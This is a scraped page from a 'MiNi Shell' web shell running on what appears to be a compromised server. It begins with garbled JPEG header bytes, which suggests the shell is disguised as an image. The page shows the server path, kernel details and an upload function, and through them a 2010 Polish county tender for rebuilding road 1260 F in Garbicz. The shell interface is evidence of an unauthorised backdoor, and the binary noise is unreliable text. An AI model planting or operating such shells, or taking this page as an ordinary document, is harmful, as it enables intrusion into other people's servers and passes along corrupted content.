JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100104/332-N-2010.html

<p class="kh_header"><b>Sulęcin: Przebudowa drogi powiatowej nr 1260 F w miejscowości Garbicz</b><br>
<b>Numer ogłoszenia: 332 - 2010; data zamieszczenia: 04.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Sulęcinie , ul. Lipowa 18, 69-200 Sulęcin, woj. lubuskie, tel. 095 7555243 do 46, faks 095 7555557.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiatsulecinski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi powiatowej nr 1260 F w miejscowości Garbicz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach projektu przebudowy drogi powiatowej nr 1260 F w miejscowości Garbicz w gminie Torzym przewidziano wykonanie poniższych zadań, dla których przygotowano odrębne opracowania projektowe:
-budowę nowych konstrukcji nawierzchni dróg i ciągów pieszych,
-budowę kanalizacji deszczowej,
-usunięcie kolizji z linią telekomunikacyjną,
-wykonanie oznakowania organizacji ruchu.

PROJEKTOWE PARAMETRY TECHNICZNE
-kategoria drogi - droga powiatowa,
-klasa drogi - L,
-prędkość projektowa - 40 km)h,
-prędkość miarodajna - 50 km)h,
-kategoria ruchu - KR 2,
-przekrój poprzeczny - uliczny, jednojezdniowy o dwóch pasach
ruchu (po jednym dla każdego kierunku ruchu),
-szerokość pasa ruchu - 3,00 m,
-szerokość  chodników przy jezdni - 1,50m,
-szerokość  zatoki postojowej - 2,50 m
-długość miejsca postojowego - 6,00 m
-pochylenie poprzeczne jezdni - 2,00% (daszkowe),
-pochylenie poprzeczne chodnika - 2,00% (do jezdni),
-szerokość zjazdów indywidualnych - 4,00 - 5,00 m,
-promienie wyokrąglające na skrzyżowaniu - 6,00m,

Konstrukcja nawierzchni
Konstrukcję nawierzchni przyjęto dla kategorii ruchu KR 2.
a) przyjęte wzmocnienie istniejącej konstrukcja nawierzchni jezdni:
warstwa ścieralna - z betonu asfaltowego 0)12,8mm o grubości 5 cm,
warstwa wiążąca - z betonu asfaltowego 0)16mm o grubości 9 cm,
frezowanie - frezowanie istniejącej nawierzchni o średniej grubości
2 cm,
b) przyjęta nowa konstrukcja nawierzchni jezdni na poszerzeniach:
warstwa ścieralna - z betonu asfaltowego 0)12,8mm o grubości 5 cm,
podbudowa zasadnicza - z betonu asfaltowego 0)16mm o grubości 9 cm,
podbudowa pomocnicza - z kruszywa łamanego stabilizowanego mechanicznie,
0)31,5mm, o grubości 30 cm - układana w dwóch
warstwach po 15cm.
c) przyjęta konstrukcja nawierzchni na zatoce postojowej:
warstwa ścieralna - z kostki brukowej betonowej kolorowej o gr.8 cm,
podsypka - piaskowo - cementowa, o grubości 4 cm
podbudowa - kruszywo łamane stabilizowane mechanicznie
0)31,5mm grubości 30 cm
przyjęta konstrukcja nawierzchni na zjazdach:
warstwa ścieralna - brukowa kostka betonowa, kolorowa o grubości 8 cm,
podsypka - piaskowo - cementowa 1:4 gr. 4 cm,
podbudowa - destrukt powstały z frezowania istniejącej nawierzchni
bitumicznej grubości 20 cm
e) przyjęta konstrukcja nawierzchni na chodnikach
warstwa ścieralna - z kostki brukowej betonowej szarej o grubości 8 cm,
podsypka - piaskowo - cementowa, o grubości 4 cm

Kanalizacja deszczowa 
Przedmiotem opracowania jest podanie rozwiązań technicznych budowy kanalizacji 

deszczowej służącej do odwodnienia nawierzchni przebudowywanej drogi powiatowej nr 

1260 F  w m. Garbicz .

Zakres opracowania:

-Kanał kanalizacji deszczowej wykonane z rur PVC Dz 315			- 397,90m  

-Kanał kanalizacji deszczowej wykonane z rur PVC Dz 400		            -   51,10m  

-Przykanaliki wykonane z rur PVC Dz 200				            -   66,0m	                                                                                    
-Studzienki kanalizacji sanitarnej prefabrykowane     O 1000                             -   13 szt. 
	
-Studzienki ściekowe					                                      -   16 szt. 

-Separator substancji ropopochodnych 10/100					   -    1 szt

Osadnik szlamowy Dn=1,50m , V=3,0m3					   -    1 szt

Przebudowa urządzeń telekomunikacyjnych.

Przedmiotem inwestycji jest przebudowa fragmentu telefonicznej linii napowietrznej własności Telekomunikacji Polskiej S.A. kolidującej z projektowaną przebudową drogi powiatowej nr 12560F w miejscowości Garbicz.
Istniejąca telekomunikacyjna linia napowietrzna koliduje z projektowaną przebudową drogi powiatowej nr 1260F. Na podbudowie słupowej podwieszone są kable sieci rozdzielczej i sieci abonenckiej.

Stan projektowany
Projektuje się budowę sześciu nowych słupów drewnianych na szczudłach żelbetowych o wysokościach 8,5m i 7,0m. Na słupie nr 51 zamontować skrzynkę kablową słupową Agmar SS50A-O. W skrzynce zamontować cztery łączówki LSA 2)10 Krone i wyposażyć w magazyn z odgromnikami. Słup uziemić. Ponadto należy przesunąć poza obręb wjazdu słup nr 56.
Kable sieci rozdzielczej
Istniejący kabel rozdzielczy XzTKMXpw 10x4x0,6 (LT02)1A)NW)R02)1-20) z Boczowa wyłączyć z istniejącego złącza (slup nr 51) i na odcinku od słupa nr 48 do projektowanej skrzynki kablowej przełożyć na projektowana podbudowę. Kabel XzTKMXpw 10x4x0,6 (LT02)1A)NW)R02)1-15) na odcinku od skrzynki kablowej LT02)1A)NW)R02)16-20  (słup nr 51) do skrzynki kablowej LT02)1A)NW)R02)1-15 (słup nr 60) wymienić i zakończyć na projektowanej i istniejącej skrzynce kablowej. 
Kable sieci abonenckiej
Istniejące napowietrzne przyłącza abonenckie wyprowadzone ze skrzynki LT02/1A)NW)R02)16-20 (słup nr 51) biegnące w stronę Boczowa i słupa nr 51a przełączyć na nową skrzynkę. Przyłącze na posesji nr 3 przebudować kablem XzTKMXpw 1x2x0,6 na odcinku od projektowanej skrzynki kablowej do słupa nr 54, na słupie wykonać złącze w mufie Raychem.

Po wykonaniu prac przełączeniowych na kablach wykonać pomiary prądem stałym.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium  w wysokości 20.000 zł należy wnieść do dnia 26-01-2010r., do godz. 12:00.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> a)	Posiadają  uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
b)	posiadają wiedzę i doświadczenie do wykonania zamówienia , (wykaz robót        z ostatnich 5 lat wg zał. druku) tj;     
  -  wykonali w ostatnich pięciu latach 2 zamówienia publiczne   o wartości 
     minimum 1.000.000 (słownie: jeden milion) zł   odpowiadających swoim rodzajem i zakresem robót   stanowiących przedmiot   zamówienia,
c)	dysponują odpowiednim potencjałem technicznym do wykonania zamówienia (wykaz sprzętu wg zał. druku )  tj. 
   - wytwórnia mas bitumicznych
- układarka  mas bitumicznych - co najmniej szt. 1,
- walec ogumiony - co najmniej szt. 1,
- walec stalowy wibr. - co najmniej szt.1,
- koparko-ładowarka - co najmniej szt.1,
- środki  transportowe -co najmniej szt. 4

d)	dysponują odpowiednimi osobami zdolnymi do wykonania zamówienia tj: 
- kierownik budowy z uprawnieniami - staż pracy w przedmiocie zamówienia    minimum 10 lat, 
e)	znajdują się w sytuacji ekonomicznej i finansowej  zapewniającej wykonanie  
       zamówienia, 
  -  posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej   400.000 PLN,
f)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia .

     Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym,      osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji  zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na
     okres korzystania z nich przy wykonaniu zamówienia. Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego,  może przedstawić inny dokument, który w wystarczający sposób  potwierdza spełnianie opisanego przez zamawiającego warunku;

Ocena spełnienia w)w warunków  dokonana zostanie zgodnie z formułą spełnia - nie spełnia 

Zamawiający wzywa wykonawców, którzy nie złożyli wymaganych przez zamawiającego oświadczeń lub dokumentów, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia                   w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania wniosków o dopuszczenie do udziału w postępowaniu albo termin składania ofert.
Zamawiający wzywa także, w wyznaczonym przez siebie terminie, do złożenia wyjaśnień dotyczących oświadczeń lub dokumentów.
       Wykonawca ma prawo złożyć tylko jedną ofertę..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wypełniony formularz ofertowy (wg zał. druku),
2. Wypełniony kosztorys ofertowy(wg zał. druku):
    - branża drogowa,
    - branża sanitarna,
    - branża telekomunikacyjna,
    - część ogólna. 
3. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji 
    działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub 
    zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 
     miesięcy przed upływem terminu składania ofert.
4. Oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu, określone w art. 
    22 ustawy [wg zał. druku ];
5. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego 
    oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia 
    Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem 
    podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że 
    uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych 
    płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione 
    nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
6.  Pełnomocnictwo (jeżeli upoważniono osobę (y) do reprezentacji) , 
7.  Wykazu niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje 
     wykonawca  (wg zał. druku);
8. Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie;
9. Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności;
10. Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;
11.	Polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.

Dokumenty mogą być przestawione w formie oryginału lub kopii poświadczonych za zgodność      z oryginałem przez upełnomocnionego przedstawiciela Wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatsulecinski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Sulęcinie ul. Lipowa 18, 69-200 Sulęcin
Wydział Komunikacji i Dróg pok. nr 16..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.01.2010 godzina 12:00, miejsce: Sekretariat Starostwa Powiatowego w Sulęcinie ul. Lipowa 18, 69-200 Sulęcin.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com